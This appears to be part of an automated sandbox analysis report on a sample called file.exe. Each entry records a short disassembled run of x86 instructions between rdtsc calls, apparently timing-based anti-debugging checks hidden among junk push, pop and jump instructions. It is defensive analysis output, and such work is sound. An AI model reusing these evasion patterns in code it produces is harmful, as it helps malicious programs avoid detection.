                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985614 second address: 98561E instructions: 0x00000000 rdtsc 0x00000002 js 00007F9FD14BA52Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B6F0 second address: 98B6F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B6F4 second address: 98B710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9FD14BA530h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9908DA second address: 9908DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993A01 second address: 993A1B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD14BA526h 0x00000008 jno 00007F9FD14BA526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jc 00007F9FD14BA526h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997FCF second address: 997FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A825 second address: 99A829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A829 second address: 99A82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A82D second address: 99A833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A833 second address: 99A875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jnl 00007F9FD0BBDFF6h 0x00000013 jc 00007F9FD0BBDFF6h 0x00000019 popad 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F9FD0BBE007h 0x00000024 mov eax, dword ptr [eax] 0x00000026 jl 00007F9FD0BBE000h 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A920 second address: 99A924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD66 second address: 92BD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD6A second address: 92BD88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9FD14BA533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD88 second address: 92BD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7A7 second address: 99E7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7AF second address: 99E7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7B3 second address: 99E7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7B7 second address: 99E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jc 00007F9FD0BBDFF6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA7B second address: 99EAAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD14BA52Fh 0x00000007 jmp 00007F9FD14BA537h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EAAB second address: 99EAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9FD0BBDFFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC36 second address: 99EC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD14BA536h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC50 second address: 99EC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDE2 second address: 99EDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDE8 second address: 99EDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDEE second address: 99EDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDF3 second address: 99EE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9FD0BBE001h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EE0A second address: 99EE49 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9FD14BA526h 0x00000008 jmp 00007F9FD14BA52Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jne 00007F9FD14BA526h 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007F9FD14BA539h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EE49 second address: 99EE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EE51 second address: 99EE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EF90 second address: 99EFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9FD0BBE001h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EFAA second address: 99EFC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9FD14BA530h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F116 second address: 99F11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F11A second address: 99F13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F9FD14BA526h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 ja 00007F9FD14BA528h 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F9FD14BA526h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F13C second address: 99F146 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9FD0BBDFF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F146 second address: 99F14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A36AF second address: 9A36B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A36B5 second address: 9A36D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F9FD14BA53Ah 0x0000000c jmp 00007F9FD14BA52Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A3C second address: 9A3A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A40 second address: 9A3A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A46 second address: 9A3A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0BBE002h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F9FD0BBDFF6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A64 second address: 9A3A6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3D2A second address: 9A3D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3D30 second address: 9A3D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9FD14BA526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3D3A second address: 9A3D68 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9FD0BBDFF6h 0x00000008 jmp 00007F9FD0BBE006h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F9FD0BBE002h 0x00000015 jo 00007F9FD0BBDFF6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A41D8 second address: 9A41DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A41DD second address: 9A41E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4322 second address: 9A4326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A448B second address: 9A44D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0BBE008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F9FD0BBE006h 0x00000011 pop eax 0x00000012 jmp 00007F9FD0BBE008h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A44D9 second address: 9A44E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A44E1 second address: 9A44E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9926 second address: 9A9934 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD14BA526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9934 second address: 9A9938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA588 second address: 9AA58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA6FF second address: 9AA705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA855 second address: 9AA859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA859 second address: 9AA861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA861 second address: 9AA867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA867 second address: 9AA87E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F9FD0BBDFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F9FD0BBE000h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B052A second address: 9B053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD14BA531h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF251 second address: 9AF272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0BBDFFFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9FD0BBDFFCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96C98A second address: 96C98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96C98E second address: 96C992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA66 second address: 96CA6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CDC6 second address: 96CDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CDCF second address: 7CDC5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3A7Ah], ebx 0x00000010 push dword ptr [ebp+122D0725h] 0x00000016 jc 00007F9FD14BA529h 0x0000001c call dword ptr [ebp+122D3AFFh] 0x00000022 pushad 0x00000023 xor dword ptr [ebp+122D3920h], edx 0x00000029 xor eax, eax 0x0000002b sub dword ptr [ebp+122D3080h], ecx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 pushad 0x00000036 xor bh, 00000029h 0x00000039 mov edx, dword ptr [ebp+122D2CD5h] 0x0000003f popad 0x00000040 jmp 00007F9FD14BA52Ah 0x00000045 mov dword ptr [ebp+122D2CF1h], eax 0x0000004b jng 00007F9FD14BA532h 0x00000051 jmp 00007F9FD14BA535h 0x00000056 mov esi, 0000003Ch 0x0000005b jns 00007F9FD14BA52Ch 0x00000061 mov dword ptr [ebp+122D3AF4h], esi 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b cld 0x0000006c lodsw 0x0000006e mov dword ptr [ebp+122D3080h], edi 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 stc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d add dword ptr [ebp+122D3AF4h], edx 0x00000083 nop 0x00000084 push ebx 0x00000085 push eax 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CE3B second address: 96CE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9FD0BBDFF6h 0x0000000a popad 0x0000000b add dword ptr [esp], 4DBCA156h 0x00000012 mov edi, 5426C357h 0x00000017 call 00007F9FD0BBDFF9h 0x0000001c pushad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F9FD0BBE007h 0x00000025 popad 0x00000026 jnc 00007F9FD0BBDFF8h 0x0000002c push esi 0x0000002d pop esi 0x0000002e popad 0x0000002f push eax 0x00000030 push esi 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push ecx 0x00000035 pop ecx 0x00000036 popad 0x00000037 pop esi 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F9FD0BBDFF6h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CFE5 second address: 96CFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D1D7 second address: 96D1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D31A second address: 96D31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D31E second address: 96D351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F9FD0BBDFF8h 0x0000000c popad 0x0000000d nop 0x0000000e adc ecx, 51D09885h 0x00000014 push 00000004h 0x00000016 jmp 00007F9FD0BBE000h 0x0000001b nop 0x0000001c je 00007F9FD0BBE004h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D351 second address: 96D355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D6CB second address: 96D6D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D6D1 second address: 96D6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D6D5 second address: 96D743 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0BBDFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F9FD0BBDFF8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 0000001Eh 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F9FD0BBDFF8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 pushad 0x00000046 mov cx, 0C0Fh 0x0000004a mov esi, dword ptr [ebp+122D2D31h] 0x00000050 popad 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jns 00007F9FD0BBDFF6h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D743 second address: 96D747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D869 second address: 96D86F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DAD8 second address: 96DAE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0C645E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF69F second address: 9AF6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF952 second address: 9AF95C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9FD0C645E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF95C second address: 9AF97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD080A019h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF97D second address: 9AF983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF983 second address: 9AF9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD080A016h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFB1F second address: 9AFB44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F9FD0C645E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFB44 second address: 9AFB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD080A00Ah 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFCEE second address: 9AFD4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9FD0C645F2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9FD0C645F6h 0x00000017 jmp 00007F9FD0C645F9h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFE8D second address: 9AFE9F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9FD080A006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFE9F second address: 9AFEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9FD0C645F8h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0078 second address: 9B0088 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F9FD080A006h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0088 second address: 9B00B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9FD0C645F9h 0x00000008 jmp 00007F9FD0C645EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B37C7 second address: 9B37E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD080A00Fh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jl 00007F9FD080A00Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B85B0 second address: 9B85BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9FD0C645E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
